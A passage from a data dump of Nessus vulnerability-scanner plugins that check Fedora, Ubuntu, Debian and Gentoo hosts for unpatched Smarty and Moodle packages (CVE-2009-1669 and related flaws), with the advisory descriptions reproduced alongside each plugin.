Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501564\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/024188.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bfcef54b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-Smarty package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-Smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"php-Smarty-2.6.25-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-Smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:21", "description": "This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-05-28T00:00:00", "title": "Fedora 9 : php-Smarty-2.6.25-1.fc9 (2009-5516)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "modified": "2009-05-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-Smarty", "cpe:/o:fedoraproject:fedora:9"], "id": "FEDORA_2009-5516.NASL", "href": "https://www.tenable.com/plugins/nessus/38932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-5516.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38932);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1669\");\n script_bugtraq_id(34918);\n script_xref(name:\"FEDORA\", value:\"2009-5516\");\n\n script_name(english:\"Fedora 9 : php-Smarty-2.6.25-1.fc9 (2009-5516)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - Bug #501564 - CVE-2009-1669 Smarty: arbitrary commands\n execution via shell metacharacters in the equation\n attribute of the math function\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501564\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/024184.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fa577a99\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php-Smarty package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-Smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"php-Smarty-2.6.25-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-Smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:37", "description": "It was discovered that Smarty did not correctly filter certain math\ninputs. A remote attacker using Smarty via a web service could exploit\nthis to execute subsets of shell commands as the web server user.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-06-25T00:00:00", "title": "Ubuntu 9.04 : smarty vulnerability (USN-791-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1669"], "modified": "2009-06-25T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:smarty", "cpe:/o:canonical:ubuntu_linux:9.04"], "id": "UBUNTU_USN-791-3.NASL", "href": "https://www.tenable.com/plugins/nessus/39518", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-791-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39518);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1669\");\n script_bugtraq_id(34918);\n script_xref(name:\"USN\", value:\"791-3\");\n\n script_name(english:\"Ubuntu 9.04 : smarty vulnerability (USN-791-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Smarty did not correctly filter certain math\ninputs. A remote attacker using Smarty via a web service could exploit\nthis to execute subsets of shell commands as the web server user.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/791-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected smarty package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"9.04\", pkgname:\"smarty\", pkgver:\"2.6.22-1ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:41", "description": "Several remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-4810\n The _expand_quoted_text function allows for certain\n restrictions in templates, like function calling and PHP\n execution, to be bypassed.\n\n - CVE-2009-1669\n The smarty_function_math function allows\n context-dependent attackers to execute arbitrary\n commands via shell metacharacters in the equation\n attribute of the math function.", "edition": 27, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1919-1 : smarty - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "modified": "2010-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:smarty"], "id": "DEBIAN_DSA-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/44784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1919. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44784);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-4810\", \"CVE-2009-1669\");\n script_bugtraq_id(31862, 34918);\n script_xref(name:\"DSA\", value:\"1919\");\n\n script_name(english:\"Debian DSA-1919-1 : smarty - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-4810\n The _expand_quoted_text function allows for certain\n restrictions in templates, like function calling and PHP\n execution, to be bypassed.\n\n - CVE-2009-1669\n The smarty_function_math function allows\n context-dependent attackers to execute arbitrary\n commands via shell metacharacters in the equation\n attribute of the math function.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504328\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=529810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-4810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1919\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the smarty package.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 2.6.14-1etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.20-1.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"smarty\", reference:\"2.6.14-1etch2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"smarty\", reference:\"2.6.20-1.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:39", "description": "The remote host is affected by the vulnerability described in GLSA-201006-13\n(Smarty: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Smarty:\n The vendor reported that the modifier.regex_replace.php plug-in\n contains an input sanitation flaw related to the ASCII NUL character\n (CVE-2008-1066).\n The vendor reported that the\n _expand_quoted_text() function in libs/Smarty_Compiler.class.php\n contains an input sanitation flaw via multiple vectors (CVE-2008-4810,\n CVE-2008-4811).\n Nine:Situations:Group::bookoo reported that\n the smarty_function_math() function in libs/plugins/function.math.php\n contains input sanitation flaw (CVE-2009-1669).\n \nImpact :\n\n These issues might allow a remote attacker to execute arbitrary PHP\n code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2010-06-03T00:00:00", "title": "GLSA-201006-13 : Smarty: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4811", "CVE-2008-4810", "CVE-2008-1066", "CVE-2009-1669"], "modified": "2010-06-03T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:smarty"], "id": "GENTOO_GLSA-201006-13.NASL", "href": "https://www.tenable.com/plugins/nessus/46793", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201006-13.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46793);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-1066\", \"CVE-2008-4810\", \"CVE-2008-4811\", \"CVE-2009-1669\");\n script_bugtraq_id(28105, 31862, 34918);\n script_xref(name:\"GLSA\", value:\"201006-13\");\n\n script_name(english:\"GLSA-201006-13 : Smarty: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201006-13\n(Smarty: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Smarty:\n The vendor reported that the modifier.regex_replace.php plug-in\n contains an input sanitation flaw related to the ASCII NUL character\n (CVE-2008-1066).\n The vendor reported that the\n _expand_quoted_text() function in libs/Smarty_Compiler.class.php\n contains an input sanitation flaw via multiple vectors (CVE-2008-4810,\n CVE-2008-4811).\n Nine:Situations:Group::bookoo reported that\n the smarty_function_math() function in libs/plugins/function.math.php\n contains input sanitation flaw (CVE-2009-1669).\n \nImpact :\n\n These issues might allow a remote attacker to execute arbitrary PHP\n code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201006-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Smarty users should upgrade to an unaffected version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-php/smarty-2.6.23'\n NOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since June 2, 2009. It is likely that your system is already\n no longer affected by this issue.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 94, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:smarty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/smarty\", unaffected:make_list(\"ge 2.6.23\"), vulnerable:make_list(\"lt 2.6.23\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Smarty\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:37", "description": "Thor Larholm discovered that PHPMailer, as used by Moodle, did not\ncorrectly escape email addresses. A local attacker with direct access\nto the Moodle database could exploit this to execute arbitrary\ncommands as the web server user. (CVE-2007-3215)\n\nNigel McNie discovered that fetching https URLs did not correctly\nescape shell meta-characters. An authenticated remote attacker could\nexecute arbitrary commands as the web server user, if curl was\ninstalled and configured. (CVE-2008-4796, MSA-09-0003)\n\nIt was discovered that Smarty (also included in Moodle), did not\ncorrectly filter certain inputs. An authenticated remote attacker\ncould exploit this to execute arbitrary PHP commands as the web server\nuser. (CVE-2008-4810, CVE-2008-4811, CVE-2009-1669)\n\nIt was discovered that the unused SpellChecker extension in Moodle did\nnot correctly handle temporary files. If the tool had been locally\nmodified, it could be made to overwrite arbitrary local files via\nsymlinks. (CVE-2008-5153)\n\nMike Churchward discovered that Moodle did not correctly filter Wiki\npage titles in certain areas. An authenticated remote attacker could\nexploit this to cause cross-site scripting (XSS), which could be used\nto modify or steal confidential data of other users within the same\nweb domain. (CVE-2008-5432, MSA-08-0022)\n\nIt was discovered that the HTML sanitizer, 'Login as' feature, and\nlogging in Moodle did not correctly handle certain inputs. An\nauthenticated remote attacker could exploit this to generate XSS,\nwhich could be used to modify or steal confidential data of other\nusers within the same web domain. (CVE-2008-5619, CVE-2009-0500,\nCVE-2009-0502, MSA-08-0026, MSA-09-0004, MSA-09-0007)\n\nIt was discovered that the HotPot module in Moodle did not correctly\nfilter SQL inputs. An authenticated remote attacker could execute\narbitrary SQL commands as the moodle database user, leading to a loss\nof privacy or denial of service. (CVE-2008-6124, MSA-08-0010)\n\nKevin Madura discovered that the forum actions and messaging settings\nin Moodle were not protected from cross-site request forgery (CSRF).\nIf an authenticated user were tricked into visiting a malicious\nwebsite while logged into Moodle, a remote attacker could change the\nuser's configurations or forum content. (CVE-2009-0499, MSA-09-0008,\nMSA-08-0023)\n\nDaniel Cabezas discovered that Moodle would leak usernames from the\nCalendar Export tool. A remote attacker could gather a list of users,\nleading to a loss of privacy. (CVE-2009-0501, MSA-09-0006)\n\nChristian Eibl discovered that the TeX filter in Moodle allowed any\nfunction to be used. An authenticated remote attacker could post a\nspecially crafted TeX formula to execute arbitrary TeX functions,\npotentially reading any file accessible to the web server user,\nleading to a loss of privacy. (CVE-2009-1171, MSA-09-0009)\n\nJohannes Kuhn discovered that Moodle did not correctly validate user\npermissions when attempting to switch user accounts. An authenticated\nremote attacker could switch to any other Moodle user, leading to a\nloss of privacy. (MSA-08-0003)\n\nHanno Boeck discovered that unconfigured Moodle instances contained\nXSS vulnerabilities. An unauthenticated remote attacker could exploit\nthis to modify or steal confidential data of other users within the\nsame web domain. (MSA-08-0004)\n\nDebbie McDonald, Mauno Korpelainen, Howard Miller, and Juan Segarra\nMontesinos discovered that when users were deleted from Moodle, their\nprofiles and avatars were still visible. An authenticated remote\nattacker could exploit this to store information in profiles even\nafter they were removed, leading to spam traffic. (MSA-08-0015,\nMSA-09-0001, MSA-09-0002)\n\nLars Vogdt discovered that Moodle did not correctly filter certain\ninputs. An authenticated remote attacker could exploit this to\ngenerate XSS from which they could modify or steal confidential data\nof other users within the same web domain. (MSA-08-0021)\n\nIt was discovered that Moodle did not correctly filter inputs for\ngroup creation, mnet, essay question, HOST param, wiki param, and\nothers. An authenticated remote attacker could exploit this to\ngenerate XSS from which they could modify or steal confidential data\nof other users within the same web domain. (MDL-9288, MDL-11759,\nMDL-12079, MDL-12793, MDL-14806)\n\nIt was discovered that Moodle did not correctly filter SQL inputs when\nperforming a restore. An attacker authenticated as a Moodle\nadministrator could execute arbitrary SQL commands as the moodle\ndatabase user, leading to a loss of privacy or denial of service.\n(MDL-11857).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 31, "published": "2009-06-25T00:00:00", "title": "Ubuntu 8.04 LTS / 8.10 : moodle vulnerabilities (USN-791-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0501", "CVE-2008-4811", "CVE-2008-5432", "CVE-2008-5619", "CVE-2009-0502", "CVE-2008-4810", "CVE-2008-4796", "CVE-2008-6124", "CVE-2008-5153", "CVE-2009-0499", "CVE-2009-0500", "CVE-2009-1171", "CVE-2009-1669", "CVE-2007-3215"], "modified": "2009-06-25T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:moodle", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10"], "id": "UBUNTU_USN-791-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-791-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39516);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2007-3215\", \"CVE-2008-4796\", \"CVE-2008-4810\", \"CVE-2008-4811\", \"CVE-2008-5153\", 